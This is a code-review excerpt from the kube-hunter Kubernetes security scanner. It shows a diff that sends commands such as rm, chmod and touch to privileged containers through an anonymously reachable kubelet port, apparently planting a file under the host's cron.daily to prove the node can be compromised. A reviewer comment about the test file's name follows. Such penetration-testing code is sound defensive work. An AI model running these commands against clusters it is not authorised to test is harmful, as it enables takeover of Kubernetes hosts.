kube_hunter/modules/hunting/kubelet.py

```diff
@@ -434,6 +452,453 @@ def is_kubesystem_pod(pod):
+    Attempts to demonstrate that a malicious actor can leverage existing privileged containers
+    exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration,
+    such that a process can be started or modified on the host.
+    """
+
+    def __init__(self, event, seconds_to_wait_for_os_command=1):
+        self.event = event
+        self.base_url = "https://{host}:10250/".format(host=self.event.host)
+        self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command
+
+    def clean_attacked_exposed_existing_privileged_container(
+        self, run_request_url, file_system_or_partition, directory_created, file_created, seconds_to_wait_for_os_command
+    ):
+
+        self.rm_command(
+            run_request_url,
+            "{}/etc/cron.daily/{}".format(directory_created, file_created),
+            seconds_to_wait_for_os_command,
+        )
+
+        self.umount_command(
+            run_request_url, file_system_or_partition, directory_created, seconds_to_wait_for_os_command
+        )
+
+        self.rmdir_command(run_request_url, directory_created, seconds_to_wait_for_os_command)
+
+    @staticmethod
+    def check_file_exists(run_request_url, file):
+        file_exists = MaliciousIntentViaSecureKubeletPort.ls_command(run_request_url, file)
+
+        return FootholdViaSecureKubeletPort.has_no_error_nor_exception(file_exists)
+
+    @staticmethod
+    def rm_command(run_request_url, file_to_remove, seconds_to_wait_for_os_command):
+        if MaliciousIntentViaSecureKubeletPort.check_file_exists(run_request_url, file_to_remove):
+            for _ in range(10):
+                command_execution_outcome = FootholdViaSecureKubeletPort.post_request(
+                    run_request_url, {"cmd": "rm -f {}".format(file_to_remove)}
+                )
+
+                if seconds_to_wait_for_os_command:
+                    time.sleep(seconds_to_wait_for_os_command)
+
+                first_check = FootholdViaSecureKubeletPort.has_no_error_nor_exception(command_execution_outcome)
+                second_check = MaliciousIntentViaSecureKubeletPort.check_file_exists(run_request_url, file_to_remove)
+
+                if first_check and not second_check:
+                    return True
+
+        return False
+
+    @staticmethod
+    def chmod_command(run_request_url, permissions, file):
+        return FootholdViaSecureKubeletPort.post_request(
+            run_request_url, {"cmd": "chmod {} {}".format(permissions, file)}
+        )
+
+    @staticmethod
+    def touch_command(run_request_url, file_to_create):
+        return FootholdViaSecureKubeletPort.post_request(run_request_url, {"cmd": "touch {}".format(file_to_create)})
+
+    def attack_exposed_existing_privileged_container(
+        self, run_request_url, directory_created, seconds_to_wait_for_os_command, file_name=None
+    ):
+        if file_name is None:
+            file_name = "harmless-honestly" + str(uuid.uuid1())
```

Comment:
As much as I like the file name :) it might be better to create it under some kube-hunter related name, so no one freaks out. what do you say?

Reply:
Changed.